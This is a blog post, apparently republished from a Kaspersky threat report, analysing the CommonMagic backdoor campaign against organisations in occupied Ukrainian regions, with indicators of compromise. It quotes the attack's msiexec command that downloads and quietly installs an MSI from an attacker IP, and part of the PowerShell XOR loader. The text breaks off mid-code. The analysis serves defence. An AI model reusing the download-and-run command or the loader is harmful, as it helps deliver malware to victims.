{"id":12221,"date":"2023-04-26T07:50:18","date_gmt":"2023-04-26T10:50:18","guid":{"rendered":"https:\/\/www.fie.undef.edu.ar\/ceptm\/?p=12221"},"modified":"2023-04-26T07:50:18","modified_gmt":"2023-04-26T10:50:18","slug":"entidades-administrativas-ucranianas-fueron-atacadas-con-la-puerta-trasera-powermagic","status":"publish","type":"post","link":"https:\/\/www.fie.undef.edu.ar\/ceptm\/?p=12221","title":{"rendered":"Entidades administrativas ucranianas fueron atacadas con la puerta trasera PowerMagic"},"content":{"rendered":"<p>Desde el comienzo del conflicto ruso-ucraniano, los investigadores de Kaspersky y la comunidad internacional en general han identificado una cantidad significativa de ciberataques ejecutados en este contexto pol\u00edtico y geopol\u00edtico particular. Ahora, nuevos ataques, vinculados a\u00a0alg\u00fan\u00a0se\u00f1uelo abren puertas traseras en los sistemas infectados.<\/p>\n<hr \/>\n<p data-gtm-vis-has-fired-11711842_122=\"1\">Since the start of the Russo-Ukrainian conflict,\u00a0<a href=\"https:\/\/securelist.com\/elections-goransom-and-hermeticwiper-attack\/105960\/\" target=\"_blank\" rel=\"noopener\" data-gtm-vis-has-fired-11711842_122=\"1\">Kaspersky researchers<\/a>\u00a0and the international community at large have identified a significant number of cyberattacks executed in a political and geopolitical context. We previously published an\u00a0<a href=\"https:\/\/securelist.com\/evaluation-of-cyber-activities-and-the-threat-landscape-in-ukraine\/106484\/\" target=\"_blank\" rel=\"noopener\" data-gtm-vis-has-fired-11711842_122=\"1\">overview of cyber activities and the threat landscape<\/a>\u00a0related to the conflict between Russia and Ukraine and continue to monitor new threats in these regions.<\/p>\n<p data-gtm-vis-has-fired-11711842_122=\"1\">In October 2022, we identified an active infection of government, agriculture and transportation organizations located in the Donetsk, Lugansk, and Crimea regions. Although the initial vector of compromise is unclear, the details of the next stage imply the use of spear phishing or similar methods. The victims navigated to a URL pointing to a ZIP archive hosted on a malicious web server. The archive, in turn, contained two files:<\/p>\n<ul data-gtm-vis-has-fired-11711842_122=\"1\">\n<li data-gtm-vis-has-fired-11711842_122=\"1\">A decoy document (we discovered PDF, XLSX and DOCX versions)<\/li>\n<li data-gtm-vis-has-fired-11711842_122=\"1\">A malicious LNK file with a double extension (e.g., .pdf.lnk) that leads to infection when opened<\/li>\n<\/ul>\n<figure id=\"attachment_12223\" aria-describedby=\"caption-attachment-12223\" style=\"width: 689px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" class=\"size-full wp-image-12223\" src=\"https:\/\/www.fie.undef.edu.ar\/ceptm\/wp-content\/uploads\/2023\/04\/CommonMagic_backdoor_01.png\" alt=\"\" width=\"689\" height=\"73\" srcset=\"https:\/\/www.fie.undef.edu.ar\/ceptm\/wp-content\/uploads\/2023\/04\/CommonMagic_backdoor_01.png 689w, https:\/\/www.fie.undef.edu.ar\/ceptm\/wp-content\/uploads\/2023\/04\/CommonMagic_backdoor_01-300x32.png 300w\" sizes=\"(max-width: 689px) 100vw, 689px\" \/><figcaption id=\"caption-attachment-12223\" class=\"wp-caption-text\">Malicious ZIP archive<\/figcaption><\/figure>\n<figure id=\"attachment_12224\" aria-describedby=\"caption-attachment-12224\" style=\"width: 784px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" class=\"size-full wp-image-12224\" src=\"https:\/\/www.fie.undef.edu.ar\/ceptm\/wp-content\/uploads\/2023\/04\/CommonMagic_backdoor_02.png\" alt=\"\" width=\"784\" height=\"881\" srcset=\"https:\/\/www.fie.undef.edu.ar\/ceptm\/wp-content\/uploads\/2023\/04\/CommonMagic_backdoor_02.png 784w, https:\/\/www.fie.undef.edu.ar\/ceptm\/wp-content\/uploads\/2023\/04\/CommonMagic_backdoor_02-267x300.png 267w, https:\/\/www.fie.undef.edu.ar\/ceptm\/wp-content\/uploads\/2023\/04\/CommonMagic_backdoor_02-768x863.png 768w\" sizes=\"(max-width: 784px) 100vw, 784px\" \/><figcaption id=\"caption-attachment-12224\" class=\"wp-caption-text\">Decoy Word document (subject: Results of the State Duma elections in the Republic of Crimea)<\/figcaption><\/figure>\n<p>n several cases, the contents of the decoy document were directly related to the name of the malicious LNK to trick the user into activating it. For example, one archive contained an LNK file named \u201c\u041f\u0440\u0438\u043a\u0430\u0437 \u041c\u0438\u043d\u0444\u0438\u043d\u0430 \u0414\u041d\u0420 \u2116 176.pdf.lnk\u201d (<a href=\"https:\/\/minfindnr.ru\/wp-content\/uploads\/2022\/09\/pr_176_ot_15-09-2022.pdf\" target=\"_blank\" rel=\"noopener\" data-gtm-vis-has-fired-11711842_122=\"1\">Ministry of Finance Decree No. 176<\/a>), and the decoy document explicitly referenced it by name in the text.<\/p>\n<figure id=\"attachment_12225\" aria-describedby=\"caption-attachment-12225\" style=\"width: 692px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" class=\"size-full wp-image-12225\" src=\"https:\/\/www.fie.undef.edu.ar\/ceptm\/wp-content\/uploads\/2023\/04\/CommonMagic_backdoor_03.png\" alt=\"\" width=\"692\" height=\"593\" srcset=\"https:\/\/www.fie.undef.edu.ar\/ceptm\/wp-content\/uploads\/2023\/04\/CommonMagic_backdoor_03.png 692w, https:\/\/www.fie.undef.edu.ar\/ceptm\/wp-content\/uploads\/2023\/04\/CommonMagic_backdoor_03-300x257.png 300w\" sizes=\"(max-width: 692px) 100vw, 692px\" \/><figcaption id=\"caption-attachment-12225\" class=\"wp-caption-text\">Decoy PDF with reference to a malicious shortcut file (subject: information about DPR Ministry of Finance Decree No. 176)<\/figcaption><\/figure>\n<p data-gtm-vis-has-fired-11711842_122=\"1\">The ZIP files were downloaded from various locations hosted on two domains: webservice-srv[.]online and webservice-srv1[.]online<\/p>\n<p data-gtm-vis-has-fired-11711842_122=\"1\">Known attachment names, redacted to remove personal information:<\/p>\n<div class=\"c-table-wrapper\" data-gtm-vis-has-fired-11711842_122=\"1\">\n<table width=\"100%\" data-gtm-vis-has-fired-11711842_122=\"1\">\n<tbody data-gtm-vis-has-fired-11711842_122=\"1\">\n<tr data-gtm-vis-has-fired-11711842_122=\"1\">\n<td width=\"70%\" data-gtm-vis-has-fired-11711842_122=\"1\"><strong data-gtm-vis-has-fired-11711842_122=\"1\">MD5 (name)<\/strong><\/td>\n<td width=\"30%\" data-gtm-vis-has-fired-11711842_122=\"1\"><strong data-gtm-vis-has-fired-11711842_122=\"1\">First detection<\/strong><\/td>\n<\/tr>\n<tr data-gtm-vis-has-fired-11711842_122=\"1\">\n<td data-gtm-vis-has-fired-11711842_122=\"1\">0a95a985e6be0918fdb4bfabf0847b5a (\u043d\u043e\u0432\u043e\u0435 \u043e\u0442\u043c\u0435\u043d\u0430 \u0440\u0435\u0448\u0435\u043d\u0438\u0439 \u0443\u0438\u043a 288.zip)<\/td>\n<td data-gtm-vis-has-fired-11711842_122=\"1\">2021-09-22 13:47<\/td>\n<\/tr>\n<tr data-gtm-vis-has-fired-11711842_122=\"1\">\n<td data-gtm-vis-has-fired-11711842_122=\"1\">ecb7af5771f4fe36a3065dc4d5516d84 (\u0432\u043d\u0435\u0441\u0435\u043d\u0438\u0435_\u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u0439_\u0432_\u043e\u0442\u0434\u0435\u043b\u044c\u043d\u044b\u0435_\u0437\u0430\u043a\u043e\u043d\u043e\u0434\u0430\u0442\u0435\u043b\u044c\u043d\u044b\u0435_\u0430\u043a\u0442\u044b_\u0440\u0444.zip)<\/td>\n<td data-gtm-vis-has-fired-11711842_122=\"1\">2022-04-28 07:36<\/td>\n<\/tr>\n<tr data-gtm-vis-has-fired-11711842_122=\"1\">\n<td data-gtm-vis-has-fired-11711842_122=\"1\">765f45198cb8039079a28289eab761c5 (\u0433\u0440\u0430\u0436\u0434\u0430\u043d\u0438\u043d \u0440\u0431 (<em data-gtm-vis-has-fired-11711842_122=\"1\">redacted<\/em>) .zip)<\/td>\n<td data-gtm-vis-has-fired-11711842_122=\"1\">2022-06-06 11:40<\/td>\n<\/tr>\n<tr data-gtm-vis-has-fired-11711842_122=\"1\">\n<td data-gtm-vis-has-fired-11711842_122=\"1\">ebaf3c6818bfc619ca2876abd6979f6d (\u0446\u0438\u043a 3638.zip)<\/td>\n<td data-gtm-vis-has-fired-11711842_122=\"1\">2022-08-05 08:39<\/td>\n<\/tr>\n<tr data-gtm-vis-has-fired-11711842_122=\"1\">\n<td data-gtm-vis-has-fired-11711842_122=\"1\">1032986517836a8b1f87db954722a33f (\u0441\u0437 14-1519 \u043e\u0442 10.08.22.zip)<\/td>\n<td data-gtm-vis-has-fired-11711842_122=\"1\">2022-08-12 10:21<\/td>\n<\/tr>\n<tr data-gtm-vis-has-fired-11711842_122=\"1\">\n<td data-gtm-vis-has-fired-11711842_122=\"1\">1de44e8da621cdeb62825d367693c75e (\u043f\u0440\u0438\u043a\u0430\u0437 \u043c\u0438\u043d\u0444\u0438\u043d\u0430 \u0434\u043d\u0440 \u2116 176.zip)<\/td>\n<td data-gtm-vis-has-fired-11711842_122=\"1\">2022-09-23 08:10<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<p data-gtm-vis-has-fired-11711842_122=\"1\">When the potential victim activates the LNK file included in the ZIP file, it triggers a chain of events that lead to the infection of the computer with a previously unseen malicious framework that we named CommonMagic. The malware and techniques used in this campaign are not particularly sophisticated, but are effective, and the code has no direct relation to any known campaigns.<\/p>\n<figure id=\"attachment_12226\" aria-describedby=\"caption-attachment-12226\" style=\"width: 2430px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" class=\"size-full wp-image-12226\" src=\"https:\/\/www.fie.undef.edu.ar\/ceptm\/wp-content\/uploads\/2023\/04\/CommonMagic_backdoor_04.png\" alt=\"\" width=\"2430\" height=\"556\" srcset=\"https:\/\/www.fie.undef.edu.ar\/ceptm\/wp-content\/uploads\/2023\/04\/CommonMagic_backdoor_04.png 2430w, https:\/\/www.fie.undef.edu.ar\/ceptm\/wp-content\/uploads\/2023\/04\/CommonMagic_backdoor_04-300x69.png 300w, https:\/\/www.fie.undef.edu.ar\/ceptm\/wp-content\/uploads\/2023\/04\/CommonMagic_backdoor_04-1024x234.png 1024w, https:\/\/www.fie.undef.edu.ar\/ceptm\/wp-content\/uploads\/2023\/04\/CommonMagic_backdoor_04-768x176.png 768w, https:\/\/www.fie.undef.edu.ar\/ceptm\/wp-content\/uploads\/2023\/04\/CommonMagic_backdoor_04-1536x351.png 1536w, https:\/\/www.fie.undef.edu.ar\/ceptm\/wp-content\/uploads\/2023\/04\/CommonMagic_backdoor_04-2048x469.png 2048w\" sizes=\"(max-width: 2430px) 100vw, 2430px\" \/><figcaption id=\"caption-attachment-12226\" class=\"wp-caption-text\">Infection chain<\/figcaption><\/figure>\n<figure id=\"attachment_12227\" aria-describedby=\"caption-attachment-12227\" style=\"width: 1024px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" class=\"size-full wp-image-12227\" src=\"https:\/\/www.fie.undef.edu.ar\/ceptm\/wp-content\/uploads\/2023\/04\/CommonMagic_backdoor_05-1024x623-1.png\" alt=\"\" width=\"1024\" height=\"623\" srcset=\"https:\/\/www.fie.undef.edu.ar\/ceptm\/wp-content\/uploads\/2023\/04\/CommonMagic_backdoor_05-1024x623-1.png 1024w, https:\/\/www.fie.undef.edu.ar\/ceptm\/wp-content\/uploads\/2023\/04\/CommonMagic_backdoor_05-1024x623-1-300x183.png 300w, https:\/\/www.fie.undef.edu.ar\/ceptm\/wp-content\/uploads\/2023\/04\/CommonMagic_backdoor_05-1024x623-1-768x467.png 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption id=\"caption-attachment-12227\" class=\"wp-caption-text\">Installation workflow<\/figcaption><\/figure>\n<p>The malicious LNK points to a remotely hosted malicious MSI file that is downloaded and started by the Windows Installer executable.<\/p>\n<div class=\"crayon-main\" data-gtm-vis-has-fired-11711842_122=\"1\">\n<div class=\"c-table-wrapper\">\n<table class=\"crayon-table\" data-gtm-vis-has-fired-11711842_122=\"1\">\n<tbody data-gtm-vis-has-fired-11711842_122=\"1\">\n<tr class=\"crayon-row\" data-gtm-vis-has-fired-11711842_122=\"1\">\n<td class=\"crayon-nums \" data-settings=\"hide\" data-gtm-vis-has-fired-11711842_122=\"1\">\n<div class=\"crayon-nums-content\" data-gtm-vis-has-fired-11711842_122=\"1\">\n<div class=\"crayon-num\" data-line=\"crayon-6447bb144ded4257499414-1\" data-gtm-vis-has-fired-11711842_122=\"1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-6447bb144ded4257499414-2\" data-gtm-vis-has-fired-11711842_122=\"1\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-6447bb144ded4257499414-3\" data-gtm-vis-has-fired-11711842_122=\"1\">3<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\" data-gtm-vis-has-fired-11711842_122=\"1\">\n<div class=\"crayon-pre\" data-gtm-vis-has-fired-11711842_122=\"1\">\n<div id=\"crayon-6447bb144ded4257499414-1\" class=\"crayon-line\" data-gtm-vis-has-fired-11711842_122=\"1\"><span class=\"crayon-ta\" data-gtm-vis-has-fired-11711842_122=\"1\">%<\/span><span class=\"crayon-i\" data-gtm-vis-has-fired-11711842_122=\"1\">WINDIR<\/span><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">%<\/span><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">\\<\/span><span class=\"crayon-i\" data-gtm-vis-has-fired-11711842_122=\"1\">System32<\/span><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">\\<\/span><span class=\"crayon-i\" data-gtm-vis-has-fired-11711842_122=\"1\">msiexec<\/span><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">.<\/span><span class=\"crayon-i\" data-gtm-vis-has-fired-11711842_122=\"1\">exe<\/span> \/<span class=\"crayon-i\" data-gtm-vis-has-fired-11711842_122=\"1\">i<\/span><\/div>\n<div id=\"crayon-6447bb144ded4257499414-2\" class=\"crayon-line crayon-striped-line\" data-gtm-vis-has-fired-11711842_122=\"1\"><\/div>\n<div id=\"crayon-6447bb144ded4257499414-3\" class=\"crayon-line\" data-gtm-vis-has-fired-11711842_122=\"1\"><span class=\"crayon-i\" data-gtm-vis-has-fired-11711842_122=\"1\">http<\/span><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">:<\/span><span class=\"crayon-c\" data-gtm-vis-has-fired-11711842_122=\"1\">\/\/185.166.217[.]184\/CFVJKXIUPHESRHUSE4FHUREHUIFERAY97A4FXA\/attachment.msi \/quiet<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<p>The MSI file is effectively a dropper package, containing an encrypted next-stage payload (<strong data-gtm-vis-has-fired-11711842_122=\"1\">service_pack.dat<\/strong>), a dropper script (<strong data-gtm-vis-has-fired-11711842_122=\"1\">runservice_pack.vbs<\/strong>) and a decoy document that is supposed to be displayed to the victim.<\/p>\n<figure id=\"attachment_12228\" aria-describedby=\"caption-attachment-12228\" style=\"width: 788px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" class=\"size-full wp-image-12228\" src=\"https:\/\/www.fie.undef.edu.ar\/ceptm\/wp-content\/uploads\/2023\/04\/CommonMagic_backdoor_06.png\" alt=\"\" width=\"788\" height=\"66\" srcset=\"https:\/\/www.fie.undef.edu.ar\/ceptm\/wp-content\/uploads\/2023\/04\/CommonMagic_backdoor_06.png 788w, https:\/\/www.fie.undef.edu.ar\/ceptm\/wp-content\/uploads\/2023\/04\/CommonMagic_backdoor_06-300x25.png 300w, https:\/\/www.fie.undef.edu.ar\/ceptm\/wp-content\/uploads\/2023\/04\/CommonMagic_backdoor_06-768x64.png 768w\" sizes=\"(max-width: 788px) 100vw, 788px\" \/><figcaption id=\"caption-attachment-12228\" class=\"wp-caption-text\">Files contained in attachment.msi<\/figcaption><\/figure>\n<p data-gtm-vis-has-fired-11711842_122=\"1\">The encrypted payload and the decoy document are written to the folder named\u00a0<strong data-gtm-vis-has-fired-11711842_122=\"1\">%APPDATA%\\WinEventCom<\/strong><strong data-gtm-vis-has-fired-11711842_122=\"1\">.\u00a0<\/strong>The VBS dropper script is, in turn, a wrapper for launching an embedded PowerShell script that decrypts the next stage using a simple one-byte XOR, launches it and deletes it from disk.<\/p>\n<p data-gtm-vis-has-fired-11711842_122=\"1\"><strong data-gtm-vis-has-fired-11711842_122=\"1\">Decryption of service_pack.dat<\/strong><\/p>\n<table class=\"crayon-table\" data-gtm-vis-has-fired-11711842_122=\"1\">\n<tbody data-gtm-vis-has-fired-11711842_122=\"1\">\n<tr class=\"crayon-row\" data-gtm-vis-has-fired-11711842_122=\"1\">\n<td class=\"crayon-nums \" data-settings=\"show\" data-gtm-vis-has-fired-11711842_122=\"1\">\n<div class=\"crayon-nums-content\" data-gtm-vis-has-fired-11711842_122=\"1\">\n<div class=\"crayon-num\" data-line=\"crayon-6447bb144ded9130004185-1\" data-gtm-vis-has-fired-11711842_122=\"1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-6447bb144ded9130004185-2\" data-gtm-vis-has-fired-11711842_122=\"1\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-6447bb144ded9130004185-3\" data-gtm-vis-has-fired-11711842_122=\"1\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-6447bb144ded9130004185-4\" data-gtm-vis-has-fired-11711842_122=\"1\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-6447bb144ded9130004185-5\" data-gtm-vis-has-fired-11711842_122=\"1\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-6447bb144ded9130004185-6\" data-gtm-vis-has-fired-11711842_122=\"1\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-6447bb144ded9130004185-7\" data-gtm-vis-has-fired-11711842_122=\"1\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-6447bb144ded9130004185-8\" data-gtm-vis-has-fired-11711842_122=\"1\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-6447bb144ded9130004185-9\" data-gtm-vis-has-fired-11711842_122=\"1\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-6447bb144ded9130004185-10\" data-gtm-vis-has-fired-11711842_122=\"1\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-6447bb144ded9130004185-11\" data-gtm-vis-has-fired-11711842_122=\"1\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-6447bb144ded9130004185-12\" data-gtm-vis-has-fired-11711842_122=\"1\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-6447bb144ded9130004185-13\" data-gtm-vis-has-fired-11711842_122=\"1\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-6447bb144ded9130004185-14\" data-gtm-vis-has-fired-11711842_122=\"1\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-6447bb144ded9130004185-15\" data-gtm-vis-has-fired-11711842_122=\"1\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-6447bb144ded9130004185-16\" data-gtm-vis-has-fired-11711842_122=\"1\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-6447bb144ded9130004185-17\" data-gtm-vis-has-fired-11711842_122=\"1\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-6447bb144ded9130004185-18\" data-gtm-vis-has-fired-11711842_122=\"1\">18<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\" data-gtm-vis-has-fired-11711842_122=\"1\">\n<div class=\"crayon-pre\" data-gtm-vis-has-fired-11711842_122=\"1\">\n<div id=\"crayon-6447bb144ded9130004185-1\" class=\"crayon-line\" data-gtm-vis-has-fired-11711842_122=\"1\"><span class=\"crayon-v\" data-gtm-vis-has-fired-11711842_122=\"1\">$inst<\/span>=<span class=\"crayon-s\" data-gtm-vis-has-fired-11711842_122=\"1\">&#8220;$env:APPDATA\\WinEventCom\\service_pack.dat&#8221;<\/span><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">;<\/span><\/div>\n<div id=\"crayon-6447bb144ded9130004185-2\" class=\"crayon-line crayon-striped-line\" data-gtm-vis-has-fired-11711842_122=\"1\"><span class=\"crayon-st\" data-gtm-vis-has-fired-11711842_122=\"1\">if<\/span> <span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">(<\/span><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">!<\/span><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">(<\/span><span class=\"crayon-r \" data-gtm-vis-has-fired-11711842_122=\"1\">Test-Path<\/span> <span class=\"crayon-v\" data-gtm-vis-has-fired-11711842_122=\"1\">$inst<\/span><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">)<\/span><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">)<\/span><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">{<\/span><\/div>\n<div id=\"crayon-6447bb144ded9130004185-3\" class=\"crayon-line\" data-gtm-vis-has-fired-11711842_122=\"1\"><span class=\"crayon-st\" data-gtm-vis-has-fired-11711842_122=\"1\">return<\/span><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">;<\/span><\/div>\n<div id=\"crayon-6447bb144ded9130004185-4\" class=\"crayon-line crayon-striped-line\" data-gtm-vis-has-fired-11711842_122=\"1\"><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">}<\/span><\/div>\n<div id=\"crayon-6447bb144ded9130004185-5\" class=\"crayon-line\" data-gtm-vis-has-fired-11711842_122=\"1\"><span class=\"crayon-v\" data-gtm-vis-has-fired-11711842_122=\"1\">$binst<\/span>=<span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">[<\/span><span class=\"crayon-i\" data-gtm-vis-has-fired-11711842_122=\"1\">System<\/span><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">.<\/span><span class=\"crayon-i\" data-gtm-vis-has-fired-11711842_122=\"1\">IO<\/span><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">.<\/span><span class=\"crayon-i\" data-gtm-vis-has-fired-11711842_122=\"1\">File<\/span><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">]<\/span><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">:<\/span><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">:<\/span><span class=\"crayon-e\" data-gtm-vis-has-fired-11711842_122=\"1\">ReadAllBytes<\/span><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">(<\/span><span class=\"crayon-v\" data-gtm-vis-has-fired-11711842_122=\"1\">$inst<\/span><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">)<\/span><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">;<\/span><\/div>\n<div id=\"crayon-6447bb144ded9130004185-6\" class=\"crayon-line crayon-striped-line\" data-gtm-vis-has-fired-11711842_122=\"1\"><span class=\"crayon-v\" data-gtm-vis-has-fired-11711842_122=\"1\">$xbinst<\/span>=<span class=\"crayon-r \" data-gtm-vis-has-fired-11711842_122=\"1\">New-Object<\/span> <span class=\"crayon-t\" data-gtm-vis-has-fired-11711842_122=\"1\">Byte<\/span><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">[<\/span><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">]<\/span> <span class=\"crayon-v\" data-gtm-vis-has-fired-11711842_122=\"1\">$binst<\/span><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">.<\/span><span class=\"crayon-i\" data-gtm-vis-has-fired-11711842_122=\"1\">Count<\/span><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">;<\/span><\/div>\n<div id=\"crayon-6447bb144ded9130004185-7\" class=\"crayon-line\" data-gtm-vis-has-fired-11711842_122=\"1\"><span class=\"crayon-st\" data-gtm-vis-has-fired-11711842_122=\"1\">for<\/span> <span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">(<\/span><span class=\"crayon-v\" data-gtm-vis-has-fired-11711842_122=\"1\">$i<\/span>=0<span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">;<\/span><span class=\"crayon-v\" data-gtm-vis-has-fired-11711842_122=\"1\">$i<\/span><span class=\"crayon-cn\" data-gtm-vis-has-fired-11711842_122=\"1\">-lt<\/span><span class=\"crayon-v\" data-gtm-vis-has-fired-11711842_122=\"1\">$binst<\/span><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">.<\/span><span class=\"crayon-i\" data-gtm-vis-has-fired-11711842_122=\"1\">Count<\/span><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">;<\/span><span class=\"crayon-v\" data-gtm-vis-has-fired-11711842_122=\"1\">$i<\/span>++<span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">)<\/span> <span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">{<\/span><\/div>\n<div id=\"crayon-6447bb144ded9130004185-8\" class=\"crayon-line crayon-striped-line\" data-gtm-vis-has-fired-11711842_122=\"1\"><span class=\"crayon-v\" data-gtm-vis-has-fired-11711842_122=\"1\">$xbinst<\/span><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">[<\/span><span class=\"crayon-v\" data-gtm-vis-has-fired-11711842_122=\"1\">$i<\/span><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">]<\/span>=<span class=\"crayon-v\" data-gtm-vis-has-fired-11711842_122=\"1\">$binst<\/span><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">[<\/span><span class=\"crayon-v\" data-gtm-vis-has-fired-11711842_122=\"1\">$i<\/span><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">]<\/span><span class=\"crayon-cn\" data-gtm-vis-has-fired-11711842_122=\"1\">-bxor0x13<\/span><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">;<\/span><\/div>\n<div id=\"crayon-6447bb144ded9130004185-9\" class=\"crayon-line\" data-gtm-vis-has-fired-11711842_122=\"1\"><span class=\"crayon-v\" data-gtm-vis-has-fired-11711842_122=\"1\">$xbinst<\/span><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">[<\/span><span class=\"crayon-v\" data-gtm-vis-has-fired-11711842_122=\"1\">$i<\/span><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">]<\/span>=<span class=\"crayon-v\" data-gtm-vis-has-fired-11711842_122=\"1\">$binst<\/span><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">[<\/span><span class=\"crayon-v\" data-gtm-vis-has-fired-11711842_122=\"1\">$i<\/span><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">]<\/span><span class=\"crayon-cn\" data-gtm-vis-has-fired-11711842_122=\"1\">-bxor0x55<\/span><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">;<\/span><\/div>\n<div id=\"crayon-6447bb144ded9130004185-10\" class=\"crayon-line crayon-striped-line\" data-gtm-vis-has-fired-11711842_122=\"1\"><span class=\"crayon-v\" data-gtm-vis-has-fired-11711842_122=\"1\">$xbinst<\/span><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">[<\/span><span class=\"crayon-v\" data-gtm-vis-has-fired-11711842_122=\"1\">$i<\/span><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">]<\/span>=<span class=\"crayon-v\" data-gtm-vis-has-fired-11711842_122=\"1\">$binst<\/span><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">[<\/span><span class=\"crayon-v\" data-gtm-vis-has-fired-11711842_122=\"1\">$i<\/span><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">]<\/span><span class=\"crayon-cn\" data-gtm-vis-has-fired-11711842_122=\"1\">-bxor0xFF<\/span><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">;<\/span><\/div>\n<div id=\"crayon-6447bb144ded9130004185-11\" class=\"crayon-line\" data-gtm-vis-has-fired-11711842_122=\"1\"><span class=\"crayon-v\" data-gtm-vis-has-fired-11711842_122=\"1\">$xbinst<\/span><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">[<\/span><span class=\"crayon-v\" data-gtm-vis-has-fired-11711842_122=\"1\">$i<\/span><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">]<\/span>=<span class=\"crayon-v\" data-gtm-vis-has-fired-11711842_122=\"1\">$binst<\/span><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">[<\/span><span class=\"crayon-v\" data-gtm-vis-has-fired-11711842_122=\"1\">$i<\/span><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">]<\/span><span class=\"crayon-cn\" data-gtm-vis-has-fired-11711842_122=\"1\">-bxor0xFF<\/span><span class=\"crayon-sy\" data-gtm-vis-has-fired-11711842_122=\"1\">;<\/span><\/div>\n<div id=\"crayon-6447bb144ded9130004185-12\" class=\"crayon-line crayon-striped-line\" 